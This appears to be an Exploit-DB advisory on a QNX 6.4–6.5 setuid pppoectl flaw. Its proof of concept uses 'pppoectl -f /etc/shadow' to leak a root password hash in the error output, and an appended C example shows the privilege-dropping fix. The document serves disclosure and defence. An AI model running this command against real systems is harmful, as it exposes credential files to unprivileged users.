QNX 6.4.x/6.5.x pppoectl – Information Disclosure

  • Author: cenobyte
    Date: 2014-03-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/32156/
  • #
    # QNX 6.4.x/6.5.x pppoectl disclose /etc/shadow by cenobyte 2013
    # <vincitamorpatriae@gmail.com>
    #
    # - vulnerability description:
    # QNX setuid root /sbin/pppoectl allows any user to gain access to privileged
    # information such as the root password hash.
    #
    # The vulnerability exists because of a failure to drop privileges or check the
    # permissions and ownership on the file specified as the configuration file.
    #
    # If a user specifies a file such as /etc/shadow, pppoectl will display the
    # first line of the shadow file in the error output.
    #
    # - vulnerable platforms:
    # QNX 6.5.0SP1
    # QNX 6.5.0
    # QNX 6.4.1
    
    $ id
    uid=100(user) gid=100
    
    $ ls -la /etc/shadow
    -rw------- 1 root root 69 Oct 10 16:55 /etc/shadow
    $ pppoectl -f /etc/shadow lo0
    pppoectl: bad parameter: "root:QSkSGrRQOSLoO:1380296317:0:0"
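
The description names two missing safeguards: dropping privileges, and checking permissions and ownership on the file passed with `-f`. The sketch below shows both in a setuid-root tool, as an added example that is not part of the original advisory and is not QNX source code. The names `drop_privileges` and `open_user_config` are hypothetical, and standard POSIX calls are assumed.

```c
/* Added example (hypothetical names, not QNX code): safe config open in a setuid tool. */
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently give up setuid/setgid privileges: group first, then user. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    /* Confirm the effective ids now match the invoking user's. */
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}

/* Open a config file on behalf of real user `ruid`; returns fd or -1 (errno set).
 * Type and owner are checked with fstat() on the open descriptor, so the
 * path cannot be swapped between the check and the read. */
int open_user_config(const char *path, uid_t ruid)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != ruid) {
        close(fd);
        errno = EACCES;   /* not a regular file owned by the caller */
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <config>\n", argv[0]); return 2; }
    /* Root is not needed to parse a user's config: drop before touching it. */
    if (drop_privileges() != 0) { perror("drop_privileges"); return 1; }
    int fd = open_user_config(argv[1], getuid());
    if (fd < 0) {
        perror(argv[1]);  /* report path and errno only, never file contents */
        return 1;
    }
    puts("config accepted");
    close(fd);
    return 0;
}
```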